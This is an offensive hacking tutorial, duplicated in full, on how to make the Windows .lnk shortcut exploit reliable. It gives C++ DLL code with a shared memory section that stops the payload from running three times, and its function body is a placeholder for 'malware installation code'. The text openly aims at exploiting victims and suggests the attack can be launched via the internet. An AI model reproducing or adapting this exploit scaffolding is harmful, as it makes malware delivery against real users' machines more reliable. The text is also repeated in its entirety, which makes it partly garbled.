Team : Legion Of Xtremers / ethicalhackingtips
author : "mukesh"
Greetz : Prashant Uniyal, b0nd, D4rk457, and Secfence team.
Exploit path : http://www.exploit-db.com/exploits/14403/
Exploit by : Ivanlef0u
Windows Link exploit (shortcut file) race condition tackling
The .lnk exploit retrieves a DLL from remote machine and execute it while the icon
for the shortcut (.lnk file) is resolved.
The race condition:
The .lnk exploitation suffers from a race condition as it executes the downloaded dll 3 times
simultaneously. This hinders the proper exploitation of the victim in case the payload dll
tries to write any file on the disk or tries to access and change any other resource on the victim
system.
First thing to be noted that the .lnk exploit is actually an undocumented DLL-Injection
technique.
The .lnk file will retrieve a file of type either .dll, .cpl or .ocx or extension which are
legitimate dynamic libraries with DllMain() defined.
The race condition need to be resolved in this retrieved DLL.
In this example, we are going to download and execute the x.dll.
The example sample DLL code is (suppose 'x' is the project name):
/* ------------x.cpp--------------------*/
#include <iostream>
#include <shellapi.h>
#pragma data_seg(".xdat") // Shared memory section to tackle race condition
bool xcheck = false;
#pragma data_seg()
void x() {
// The exploit worked, now install malware
// Place all mallware installation code here.
// The code to access the resources
// like file creation etc...
}
void in() { // This routine will handle the race condition
if (xcheck == false) { // If false then set it true and access the resources
xcheck = true;x(); // otherwise just exit the routine.
}
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
in();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
/*----------end of file-----------------*/
Also a x.DEF file is needed and must be added to the project workspace.
This file will define the custom memory sections attributes:
SECTIONS
.xdat READ WRITE SHARED
There exists more ways to tackle race condition like the use of mutexes, semaphores etc.
The same exploit can aslo be made cross browser and can also be launched via internet.
But try a little it urself. I'll tell u later...."mukesh"
[Study the exploit to know more the above discussion. The link has been provided above.]
author : "mukesh"
Greetz : Prashant Uniyal, b0nd, D4rk457, and Secfence team.
Exploit path : http://www.exploit-db.com/exploits/14403/
Exploit by : Ivanlef0u
Windows Link exploit (shortcut file) race condition tackling
The .lnk exploit retrieves a DLL from remote machine and execute it while the icon
for the shortcut (.lnk file) is resolved.
The race condition:
The .lnk exploitation suffers from a race condition as it executes the downloaded dll 3 times
simultaneously. This hinders the proper exploitation of the victim in case the payload dll
tries to write any file on the disk or tries to access and change any other resource on the victim
system.
First thing to be noted that the .lnk exploit is actually an undocumented DLL-Injection
technique.
The .lnk file will retrieve a file of type either .dll, .cpl or .ocx or extension which are
legitimate dynamic libraries with DllMain() defined.
The race condition need to be resolved in this retrieved DLL.
In this example, we are going to download and execute the x.dll.
The example sample DLL code is (suppose 'x' is the project name):
/* ------------x.cpp--------------------*/
#include <iostream>
#include <shellapi.h>
#pragma data_seg(".xdat") // Shared memory section to tackle race condition
bool xcheck = false;
#pragma data_seg()
void x() {
// The exploit worked, now install malware
// Place all mallware installation code here.
// The code to access the resources
// like file creation etc...
}
void in() { // This routine will handle the race condition
if (xcheck == false) { // If false then set it true and access the resources
xcheck = true;x(); // otherwise just exit the routine.
}
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
in();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
/*----------end of file-----------------*/
Also a x.DEF file is needed and must be added to the project workspace.
This file will define the custom memory sections attributes:
SECTIONS
.xdat READ WRITE SHARED
There exists more ways to tackle race condition like the use of mutexes, semaphores etc.
The same exploit can aslo be made cross browser and can also be launched via internet.
But try a little it urself. I'll tell u later...."mukesh"
[Study the exploit to know more the above discussion. The link has been provided above.]